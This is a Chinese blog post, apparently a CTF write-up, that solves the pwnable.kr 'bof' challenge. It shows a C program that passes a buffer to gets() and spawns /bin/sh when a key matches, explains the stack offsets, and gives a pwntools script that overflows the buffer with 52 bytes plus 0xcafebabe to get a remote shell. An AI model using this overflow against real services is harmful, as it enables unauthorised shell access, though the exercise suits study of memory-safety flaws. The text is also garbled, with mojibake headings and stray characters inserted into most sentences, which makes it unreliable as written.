PWN學(xué)習(xí)筆記(三)

PWN學(xué)習(xí)筆記(三)

0x01

這次我們開始進(jìn)行第三個題目:


截圖_2019-06-19_20-26-11.png

下面就是bof.c的代碼:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

從代碼中我們可以看到這里使用了一個危險函數(shù)gets()它呀,這里我們可以控制overflowme的內(nèi)容來控制堆棧的內(nèi)容,覆蓋掉key的原本的內(nèi)容,讓key的值等于0xcafebabe恢暖。這樣我們就可以輕松過關(guān)了盯蝴。是不是很簡單呢禁谦?

0x02

下面我們就來看一下程序的匯編代碼:


截圖_2019-06-19_21-40-30.png

通過上圖显设,我們可以看到我們輸入的變量保存在ebp-0x2c的地方,而我們的key則保存在ebp+0x8的地方棺蛛,這里我們就需要了解一下這時的棧結(jié)構(gòu):

截圖_2019-06-19_22-05-34.png

所以我們需要控制我們的輸入怔蚌,覆蓋掉ebp+0x8的地方,這里我使用了pwntools來幫助我實現(xiàn)這段shellcode旁赊。

from pwn import *
context.log_level = 'debug'
conn = remote('pwnable.kr',9000)
p = 'A'*52
p += p32(0xcafebabe)
conn.sendline(p)
conn.interactive()

我們需要從ebp-0x2c一直覆蓋到ebp+8的地方桦踊,一共是56字節(jié),但是最后4個字節(jié)是我們的key终畅,所以我使用了52個A加上我們的目標(biāo)字符串進(jìn)行拼接籍胯。
運行上面的這段python代碼,就可以獲得flag了离福。
PS:pwntools是一個非常好用的pwn工具杖狼,希望大家能掌握它的使用。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末妖爷,一起剝皮案震驚了整個濱河市蝶涩,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌絮识,老刑警劉巖绿聘,帶你破解...
    沈念sama閱讀 219,490評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異次舌,居然都是意外死亡熄攘,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評論 3 395
  • 文/潘曉璐 我一進(jìn)店門彼念,熙熙樓的掌柜王于貴愁眉苦臉地迎上來挪圾,“玉大人,你說我怎么就攤上這事逐沙≌芩迹” “怎么了?”我有些...
    開封第一講書人閱讀 165,830評論 0 356
  • 文/不壞的土叔 我叫張陵吩案,是天一觀的道長也殖。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么忆嗜? 我笑而不...
    開封第一講書人閱讀 58,957評論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮崎岂,結(jié)果婚禮上捆毫,老公的妹妹穿的比我還像新娘。我一直安慰自己冲甘,他們只是感情好绩卤,可當(dāng)我...
    茶點故事閱讀 67,974評論 6 393
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著江醇,像睡著了一般濒憋。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上陶夜,一...
    開封第一講書人閱讀 51,754評論 1 307
  • 那天凛驮,我揣著相機與錄音,去河邊找鬼条辟。 笑死黔夭,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的羽嫡。 我是一名探鬼主播本姥,決...
    沈念sama閱讀 40,464評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼杭棵!你這毒婦竟也來了婚惫?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 序言:老撾萬榮一對情侶失蹤魂爪,失蹤者是張志新(化名)和其女友劉穎先舷,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體甫窟,經(jīng)...
    沈念sama閱讀 45,847評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡密浑,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,995評論 3 338
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了粗井。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片尔破。...
    茶點故事閱讀 40,137評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖浇衬,靈堂內(nèi)的尸體忽然破棺而出懒构,到底是詐尸還是另有隱情,我是刑警寧澤耘擂,帶...
    沈念sama閱讀 35,819評論 5 346
  • 正文 年R本政府宣布胆剧,位于F島的核電站,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏秩霍。R本人自食惡果不足惜篙悯,卻給世界環(huán)境...
    茶點故事閱讀 41,482評論 3 331
  • 文/蒙蒙 一晕鹊、第九天 我趴在偏房一處隱蔽的房頂上張望宗雇。 院中可真熱鬧,春花似錦码秉、人聲如沸颠悬。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽赔癌。三九已至诞外,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間灾票,已是汗流浹背峡谊。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留铝条,地道東北人靖苇。 一個月前我還...
    沈念sama閱讀 48,409評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像班缰,于是被迫代替她去往敵國和親贤壁。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,086評論 2 355

推薦閱讀更多精彩內(nèi)容

  • Exercise 3 方法:打開終端運行make qemu-gdb埠忘,再打開另一個終端運行make gdb脾拆,通過b ...
    找不到工作閱讀 10,080評論 0 6
  • 匯編與反匯編 匯編與反匯編的區(qū)別 phase_1 比較字符串是否相同 二進(jìn)制炸彈 常見匯編指令詳解 AT&T 格式...
    Jerry_589e閱讀 912評論 0 0
  • ”Pwn”是一個黑客語法的俚語詞 ,是指攻破設(shè)備或者系統(tǒng) 莹妒。發(fā)音類似“砰”名船,對黑客而言,這就是成功實施黑客攻擊的聲...
    charlie_heng閱讀 21,301評論 3 19
  • 午后旨怠,陽光暖暖的渠驼,北方的四月是一年之中最好的季節(jié)。到處可以看見盛開的花朵鉴腻,紅的迷扇,粉的,黃的...爽哎,它們開在城市...
    張明軒閱讀 179評論 0 0
  • 正好這本書的開始都在講我的紅色蜓席,但是看著看著我會覺得我性格里面還有藍(lán)色和黃色的部分。 比如我覺得我有紅色的積極樂觀...
    壹顆大橙子閱讀 166評論 0 0